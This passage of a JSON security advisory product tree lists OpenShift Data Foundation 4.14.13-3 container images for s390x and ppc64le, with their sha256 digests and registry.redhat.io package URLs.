"purl": "pkg:oci/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.14.13-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"product": {
"name": "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"product_id": "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-cli-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
